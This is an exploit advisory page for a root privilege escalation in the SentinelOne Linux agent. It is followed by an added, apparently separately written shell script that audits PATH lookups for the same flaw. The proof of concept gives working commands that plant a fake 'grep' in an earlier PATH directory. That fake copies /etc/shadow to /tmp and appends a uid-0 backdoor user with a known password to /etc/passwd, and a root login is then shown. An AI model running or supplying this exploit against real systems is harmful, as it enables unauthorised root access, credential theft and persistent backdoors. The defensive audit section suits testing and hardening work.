## https://sploitus.com/exploit?id=PACKETSTORM:170128
Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability  
Date: 12/06/2022  
Exploit Author: ouch_this_hurts  
Vendor Homepage: https://www.sentinelone.com/  
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas  
Version: 22.3.2.5  
Tested on: Ubuntu 22.04.x  
CVE: NA  
  
Not enough AI in the world can help you write secure software, it seems. The vendor doesn't make reporting vulnerabilities easy, so to exploit-db it goes :)  
  
Protips:  
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.  
- If you require me to use HackerOne, I'm not going to bother.  
- If you don't have a security.txt, how do you expect me to contact you?  
  
Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:  
  
Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!  
  
PoC below:  
1. Find the directory that comes earliest in the `PATH` the agent's root process inherits and that you can write to, or just override the `PATH` to whatever you want in `/etc/environment` using some other staged exploit. (On a stock Ubuntu install `/usr/local/bin` is searched before `/usr/bin`, but it is root-owned, so this step assumes write access there or control over `/etc/environment`.)  
2. Create the following `grep` file in that directory and make sure it's executable:  
  
```shell  
# The heredoc delimiter is unquoted, so the \$ escapes are required to keep the
# hash intact; everything else is written to the fake grep verbatim.
cat << SENTINELOOPS > /usr/local/bin/grep  
#!/bin/bash  
# This runs as root when the agent invokes "grep" via PATH on start.
# I think I'll have the passwds pl0x  
cat /etc/shadow > /tmp/etc_shadow  
  
# password is password :)  
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd  
SENTINELOOPS  
  
# Note: the fake grep never hands off to the real one, so the agent's own
# command will misbehave; the privilege escalation has already happened by then.
chmod +x /usr/local/bin/grep  
```  
  
3. Wait for the machine to reboot, then log in as `sentinel_oops:password` :)  
  
```  
$ su sentinel_oops  
Password:   
# whoami   
root  
```  
  
What actually happened here? On start, `sentinelagent` (running as root) runs `sh -c "grep...."`. The command names `grep` without an absolute path, and the shell inherits the agent's `PATH`, so the first `grep` found in that search order is executed as root. Whoever can write to a directory that precedes `/usr/bin` in that `PATH` decides what root runs; this is the untrusted search path pattern of CWE-427.  
  
So there are potentially other ways of privilege escalation via this "agent". From examining the binary, the following commands also appear to be invoked by name through the `PATH`, so each looks like a candidate for the same substitution:  
- `grep` (as demonstrated above)  
- `pgrep`  
- `xargs`  
- `cat`  
- `ldd`  
- `lsmod`  
- `mksh`  
- `awk`  
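As an added check (example code written for this page, not from the advisory author or from SentinelOne), the script below models the `sh -c "grep ..."` lookup described above and audits a `PATH` string for the same weakness across the command names in the list. The directories it inspects are a constructed temp-dir layout; `resolve_in_path`, `hijack_report` and `hardened_exec` are names chosen here, and the pinned `PATH` inside `hardened_exec` is an assumption about what a sane root-side search path looks like, not anything taken from the agent.

```shell
#!/bin/sh
# Added example for this write-up; not code from the advisory author or from
# SentinelOne. It models the lookup the advisory describes (a root process
# running `sh -c "grep ..."` resolves `grep` through its inherited PATH) and
# audits a PATH for the same weakness across the other command names listed
# above. Everything it creates lives in a constructed temp directory, so it
# never touches a real agent install.
set -u

# resolve_in_path CMD PATHSTRING
# Print the file that `sh -c "CMD ..."` would execute for the given PATH: the
# first executable regular file found scanning the entries left to right
# (shell functions, builtins and the command hash table are ignored here).
resolve_in_path() {
    local cmd="$1" path="$2" dir
    local IFS=':'
    for dir in $path; do
        [ -n "$dir" ] || dir=.          # an empty entry means the current directory
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            printf '%s\n' "$dir/$cmd"
            return 0
        fi
    done
    return 1
}

# hijack_report PATHSTRING CMD...
# One line per CMD: name, the file that wins the lookup, and whether the
# directory holding it is world-writable (plantable by any local user):
#   CMD<TAB>resolved-path<TAB>world-writable|ok|missing
hijack_report() {
    local path="$1" cmd hit dir state
    shift
    for cmd in "$@"; do
        if hit=$(resolve_in_path "$cmd" "$path"); then
            dir=${hit%/*}
            if [ -n "$(find "$dir" -prune -perm -o+w 2>/dev/null)" ]; then
                state=world-writable
            else
                state=ok
            fi
        else
            hit=-
            state=missing
        fi
        printf '%s\t%s\t%s\n' "$cmd" "$hit" "$state"
    done
}

# hardened_exec CMDLINE
# The pattern that closes the hole: a privileged process must not let an
# inherited PATH choose its helpers. Drop the environment, pin PATH to the
# system directories (an assumed sane value), and better still name helpers
# by absolute path.
hardened_exec() {
    env -i PATH=/usr/sbin:/usr/bin:/sbin:/bin /bin/sh -c "$*"
}

# Demo on a constructed layout shaped like Ubuntu's default PATH, where a
# local bin directory is searched before /usr/bin.
demo() {
    local t evil
    t=$(mktemp -d) || return 1
    evil=$t/local-bin
    mkdir -p "$evil"
    chmod 777 "$evil"                                   # attacker-writable, as the PoC assumes
    printf '#!/bin/sh\necho HIJACKED\n' > "$evil/grep"  # stand-in for the PoC's fake grep
    chmod +x "$evil/grep"
    echo "lookup with inherited PATH:"
    hijack_report "$evil:/usr/bin:/bin" grep pgrep xargs cat ldd lsmod mksh awk
    echo "lookup under hardened_exec:"
    hardened_exec 'command -v grep || echo "grep not found in pinned PATH"'
    rm -rf "$t"
}

demo
```

Run it as an unprivileged user on the box you are checking and replace the demo `PATH` with the one the agent's process actually inherits (`tr '\0' '\n' < /proc/<pid>/environ` as root, or the value set in `/etc/environment`); any `world-writable` row is a directory where the PoC's trick works for every local user, and any row whose directory is merely writable by you is one where it works for you.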
  
[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)